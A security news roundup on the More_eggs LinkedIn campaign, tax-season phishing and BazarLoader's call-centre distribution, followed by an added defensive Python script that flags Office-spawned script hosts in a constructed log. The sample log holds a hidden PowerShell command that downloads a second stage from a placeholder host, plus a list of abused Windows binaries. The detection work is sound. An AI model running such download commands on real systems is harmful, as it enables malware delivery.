Malware distribution campaign via LinkedIn
The eSentire research team has published its analysis of a new malware distribution campaign on LinkedIn. Threat actors send zipped files under the pretext of job offers, naming the file after the supposed job position to gain the victim’s trust. Once the attachment is opened, installation of the More_eggs malware, which is characterised by using legitimate Windows processes to evade security solutions, starts stealthily. This malware would function as a dropper: once the user’s device is infected, access to the system is established in order to download further malware or to exfiltrate information. It is worth noting that this tool is sold as Malware as a Service (MaaS) by the Golden Chickens group, which, according to the researchers, has links to other advanced actors such as FIN6, Cobalt Group and Evilnum.
Tax season impersonation campaigns
Several global fraudulent email campaigns have been detected that use the tax filing season as a lure. The aim of the threat actors behind these operations would be both to distribute malware, via attachments in the messages, and to collect data via phishing pages. A warning issued by INCIBE points to an ongoing campaign targeting employees and/or the self-employed in Spain in which the Tax Agency is being impersonated. Likewise, the US Internal Revenue Service (IRS) is reportedly being impersonated in phishing emails targeting students and teaching staff, as well as in the distribution of malware via download links or attachments.
BazarLoader uses underground call centres for distribution
Researchers at Recorded Future warn of a new campaign by the operators of the BazarLoader malware, active since January 2021, in which underground call centres are used to trick victims into downloading and opening the malicious documents that will infect them. Although this is not the first time this methodology has been observed, it is the first time that call centres have been used by large-scale malware such as BazarLoader, in an operation that has been called BazarCall or BazaCall. These campaigns start by sending spam emails to targeted victims; the emails usually pretend to be offers, free trials or subscriptions to medical, IT or other financial services. Recipients are told that they can call a phone number to get more information about the offer, and if they call, they reach English-speaking operators who guide them through downloading the attachment, disabling Office security features and allowing the document (usually an Excel or Word file) to enable macros, through which the malware is downloaded and the system is infected. Security analysts have observed such campaigns also deploying the Ryuk ransomware or the TrickBot trojan.
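Both the More_eggs item above (a dropper that runs through legitimate Windows processes) and the BazarCall item (a macro-enabled Office document that downloads the next stage) leave the same footprint on an endpoint: an Office application spawning a script host or other signed system binary, which then reaches out to a URL. The following is an added detection example, not code from eSentire, Recorded Future or any of the reports summarised here. The log format, the host name, the file names and all five process-creation events are constructed, and the list of "suspicious" child binaries is an assumption for illustration; the page does not say which Windows processes More_eggs actually uses.

```python
"""Added example: flag Office-spawned script hosts and script hosts that
reference a URL, over a constructed process-creation log (CSV)."""
from dataclasses import dataclass
import csv
import io

# Office applications that should rarely launch scripting or download helpers.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Legitimate, signed Windows binaries commonly used as second-stage launchers.
# Assumption for the example; the page does not list the ones More_eggs uses.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "regsvr32.exe", "rundll32.exe", "msxsl.exe"}

# Constructed sample log: five events from a hypothetical HR workstation.
# Event 2 and event 4 are the ones a defender would want surfaced.
SAMPLE_LOG = r'''ts,host,parent_image,image,cmdline
2021-04-01T09:11:58Z,WS-HR-07,C:\Windows\explorer.exe,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,"EXCEL.EXE ""C:\Users\hr\Downloads\Senior_Developer.xls"""
2021-04-01T09:12:03Z,WS-HR-07,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,C:\Windows\System32\cmd.exe,"cmd.exe /c cscript //nologo %TEMP%\update.js"
2021-04-01T09:12:04Z,WS-HR-07,C:\Windows\System32\cmd.exe,C:\Windows\System32\cscript.exe,"cscript //nologo C:\Users\hr\AppData\Local\Temp\update.js"
2021-04-01T09:12:09Z,WS-HR-07,C:\Windows\System32\cscript.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"powershell.exe -w hidden -c ""Invoke-WebRequest http://example.invalid/stage2"""
2021-04-01T09:15:40Z,WS-HR-07,C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE,C:\Windows\splwow64.exe,"splwow64.exe 12288"
'''


@dataclass
class ProcessEvent:
    ts: str
    host: str
    parent: str      # image basename, lower-cased
    child: str       # image basename, lower-cased
    cmdline: str


@dataclass
class Alert:
    rule: str
    event: ProcessEvent


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    """Parse the CSV log into ProcessEvent records."""
    return [ProcessEvent(r["ts"], r["host"], _basename(r["parent_image"]),
                         _basename(r["image"]), r["cmdline"])
            for r in csv.DictReader(io.StringIO(text))]


def detect(events: list) -> list:
    """Apply two behavioural rules and return the alerts in log order.

    Rule 1: an Office application directly spawns a script host / LOLBin
            (the macro-to-loader step described for BazarCall).
    Rule 2: a script host is started with a URL on its command line
            (the stage-two download step described for More_eggs).
    """
    alerts = []
    for ev in events:
        cmd = ev.cmdline.lower()
        if ev.parent in OFFICE_PARENTS and ev.child in SUSPICIOUS_CHILDREN:
            alerts.append(Alert("office_spawns_script_host", ev))
        elif ev.child in SUSPICIOUS_CHILDREN and ("http://" in cmd or "https://" in cmd):
            alerts.append(Alert("script_host_with_url", ev))
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_LOG)):
        print(f"{a.event.ts} {a.event.host} [{a.rule}] "
              f"{a.event.parent} -> {a.event.child}: {a.event.cmdline}")
```

Run as a script it prints two alerts: the Excel process launching cmd.exe (rule 1) and the later PowerShell invocation carrying a URL (rule 2); the benign Explorer-to-Excel and Word-to-splwow64 events are not reported. Rule 2 will also fire on legitimate administrative scripts that fetch content, so in a real deployment it is a candidate for allow-listing by script path or signer rather than a standalone high-severity alert. Neither rule depends on the macro being enabled in a particular way, which is what makes this kind of parent/child telemetry useful against a campaign where the victim is talked through disabling Office protections by a call-centre operator.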